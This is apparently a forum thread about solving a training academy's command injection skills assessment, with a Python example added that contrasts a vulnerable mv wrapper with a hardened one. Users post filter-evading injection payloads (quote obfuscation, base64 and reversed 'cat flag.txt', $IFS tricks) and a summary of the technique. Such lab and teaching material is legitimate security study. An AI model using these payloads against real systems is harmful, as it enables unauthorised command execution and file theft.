Academy command injection skills assessment

Hi,

I am trying to solve the Command Injection Skills Assessment.
I have tried the payloads below but I am unable to solve it. Could anyone guide me on solving this?

URL: http://167.99.202.193:32579/index.php?to=tmp&from=696212415.txt&finish=1&move=1
Parameter: from
Payload: 696212415.txt&&w'h'o'am'i
696212415.txt&&w"h"o"am"i
696212415.txt&&bash<<<$(base64${IFS}-d<<<Y2F0IC9mbGFnLnR4dA==)
$(rev<<<'txt.galf/. tac')

Response:
Error while moving: mv: missing destination file operand after ‘/var/www/html/files/696212415.txt’
Try ‘mv --help’ for more information.

You try to insert into a command like mv from to.

The Unix mv needs two arguments, from and to. You must create a code injection which yields a valid mv command call followed by a command call you would like to execute.

You can develop the needed arguments with a local bash. Like

from=filea
to=fileb
mv $from $to

If the arguments for from and to work locally, then you can test the bash command injection on the server.
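The mv wrapper Xtal describes, rebuilt here in Python as an added example (this is not code from the Academy lab or from anyone in this thread): the vulnerable pattern that pastes the from/to parameters into a shell string sits next to a hardened version that validates both names against a plain file-name allowlist and invokes mv with an argument list, so no shell ever parses the user input. The directory, file names and the hostile sample name in demo() are constructed for the illustration.

```python
import re
import subprocess
import tempfile
from pathlib import Path
from typing import List

# Allowlist for plain file names: letters, digits, dot, underscore, hyphen.
# Spaces, quotes, &, |, ;, $, <, >, ( ) and / never match, so none of the
# operators an injection relies on can reach the command at all.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def validate_name(name: str) -> str:
    """Return name unchanged if it is a plain file name, else raise ValueError."""
    if not SAFE_NAME.fullmatch(name) or name in (".", ".."):
        raise ValueError(f"rejected file name: {name!r}")
    return name


def vulnerable_command(base: Path, src: str, dst: str) -> str:
    """The bug pattern: request parameters interpolated into one shell string.
    Whatever the user puts in src/dst is parsed by the shell, operators included."""
    return f"mv {base / src} {base / dst}"


def build_move_argv(base: Path, src: str, dst: str) -> List[str]:
    """Hardened form: validate first, then build an argv list (no shell string).
    '--' stops mv from treating a name that starts with '-' as an option."""
    src = validate_name(src)
    dst = validate_name(dst)
    return ["mv", "--", str(base / src), str(base / dst)]


def move_file(base: Path, src: str, dst: str) -> Path:
    """Run mv with the argv list; each element is passed to mv literally."""
    argv = build_move_argv(base, src, dst)
    subprocess.run(argv, check=True)
    return base / dst


def demo() -> bool:
    """Round trip in a temp dir: a normal move succeeds, a hostile name is refused
    before any process is started. Returns True when both hold."""
    with tempfile.TemporaryDirectory() as d:
        base = Path(d)
        (base / "a.txt").write_text("hello")          # constructed sample file
        moved = move_file(base, "a.txt", "b.txt")
        ok = moved.read_text() == "hello" and not (base / "a.txt").exists()
        try:
            move_file(base, "b.txt&&whoami", "c.txt")  # constructed hostile input
            return False
        except ValueError:
            return ok


if __name__ == "__main__":
    print("vulnerable string:", vulnerable_command(Path("/srv/files"), "a.txt&&whoami", "b.txt"))
    print("hardened argv:    ", build_move_argv(Path("/srv/files"), "a.txt", "b.txt"))
    print("demo passed:      ", demo())
```

The allowlist also blocks path traversal, since a slash or a bare ".." never passes validate_name; escaping (shell quoting the interpolated string) would only address the operator problem, which is why the argv form is preferred over trying to sanitise the string.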

Hi Xtal,

Thank you for the information, I have solved the assessment.
Need to identify the working injection operator (|| or && or & or $() or ;) and then find the proper payload to read the flag.txt (use o'bf'usc'at'ion or proper encoding and replace the filtered characters with environment variables or alternate characters).
Sometimes the content of the flag.txt will appear with the error message.


Hi Appsec,

Currently working on this one, just keep getting hit with 302s so not sure where any purchase is. Do you know if I can use either download, copy, or move - will intercepting and injecting any of these commands work, or is there a specific one that’s the way in and if so do you know why? Thanks!